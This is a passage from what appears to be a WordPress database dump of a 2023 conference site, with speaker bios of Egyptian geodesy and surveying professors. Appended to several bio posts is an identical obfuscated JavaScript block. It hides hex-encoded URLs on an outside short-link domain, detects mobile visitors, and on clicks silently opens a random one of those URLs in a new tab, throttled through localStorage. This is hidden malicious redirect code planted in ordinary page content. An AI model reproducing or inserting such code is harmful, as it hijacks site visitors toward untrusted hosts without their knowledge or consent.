_0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Dr. Moustafa Baraka','','publish','closed','closed','','prof-dr-moustafa-baraka','','','2023-01-14 21:38:21','2023-01-14 21:38:21','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3577',0,'dt_team','',0),
(3578,1,'2023-01-14 20:41:13','2023-01-14 20:41:13','','loc2','','inherit','open','closed','','loc2','','','2023-01-14 20:41:13','2023-01-14 20:41:13','',3577,'https://gsw2023.com/wp-content/uploads/2023/01/loc2.jpg',0,'attachment','image/jpeg',0),
(3581,1,'2023-01-14 20:47:39','2023-01-14 20:47:39','<!-- wp:cover {\"overlayColor\":\"accent\"} -->\n<div class=\"wp-block-cover\"><span aria-hidden=\"true\" class=\"wp-block-cover__background has-accent-background-color has-background-dim-100 has-background-dim\"></span><div class=\"wp-block-cover__inner-container\"><!-- wp:paragraph {\"align\":\"center\",\"placeholder\":\"Write title…\",\"fontSize\":\"large\"} -->\n<p class=\"has-text-align-center has-large-font-size\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:table -->\n<figure class=\"wp-block-table\"><table><tbody><tr><td>Dr. Adel El-Shazly, Graduated in 1985 from the Faculty of Engineering, Cairo University. Since 1985 he had been working at Public Works Department, Faculty of Engineering, Cairo University. He got his MSc. degree in 1989 and Ph.D. in 1995. Dr. El-Shazly was Associate Professor from 2001 to 2006, He has been working as Professor of surveying and Geodesy since 2006. He has industrial experience in the field of surveying and mapping. He has been working as director for ELWADY GROUP for Engineering Consultations Office since 1997.  His research interests are Vertical datum and Geoid determination, GNSS Precise point Positioning, Surveying and Map Production from satellite images, GIS &amp; Remote Sensing applications, Hydrographic Survey</td></tr></tbody></table></figure>\n<!-- /wp:table --></div></div>\n<!-- /wp:cover -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Dr. ADEL HASSAN EL-SHAZLY','','publish','closed','closed','','dr-adel-hassan-el-shazly','','','2023-01-14 20:47:41','2023-01-14 20:47:41','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3581',0,'dt_team','',0),
(3582,1,'2023-01-14 20:46:32','2023-01-14 20:46:32','','loc3','','inherit','open','closed','','loc3','','','2023-01-14 20:46:32','2023-01-14 20:46:32','',3581,'https://gsw2023.com/wp-content/uploads/2023/01/loc3.jpg',0,'attachment','image/jpeg',0),
(3583,1,'2023-01-14 20:51:30','2023-01-14 20:51:30','<!-- wp:cover {\"overlayColor\":\"accent\"} -->\n<div class=\"wp-block-cover\"><span aria-hidden=\"true\" class=\"wp-block-cover__background has-accent-background-color has-background-dim-100 has-background-dim\"></span><div class=\"wp-block-cover__inner-container\"><!-- wp:paragraph {\"align\":\"center\",\"placeholder\":\"Write title…\",\"fontSize\":\"large\"} -->\n<p class=\"has-text-align-center has-large-font-size\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:table -->\n<figure class=\"wp-block-table\"><table><tbody><tr><td><strong><em>Prof. Dr. Gomaa Mohamed Dawod</em></strong><br><strong><em>dawod_gomaa@yahoo.com</em></strong><br><strong> </strong><strong> </strong><strong> </strong><br>Prof. Gomaa Dawod obtained BSC in Surveying Engineering in 1985, MSC in 1991, PhD in 1998, and Professor Degree in 2009. He has high-quality field experiences in several branches of Geomatics, particularly in satellite-based geodetic networks, geoid modelling, gravity, GIS applications, and environmental studies. He has participated in numerous surveying and mapping projects on national and regional levels. Also, he has published more than eighty papers, developed twenty books in Arabic, along with more than two-hundred training videos. He has supervised many academic thesis in Egypt and Saudi Arabia, and refereed many manuscripts in international journals. In addition, he attained several national and international prizes for his overall achievements. Recently, he is a consultant for some governmental organizations in Egypt. Currently, he is professor emirate in the Survey Research Institute (SRI), National Water Research Center (NWRC), Egypt.</td></tr></tbody></table></figure>\n<!-- /wp:table --></div></div>\n<!-- /wp:cover -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a 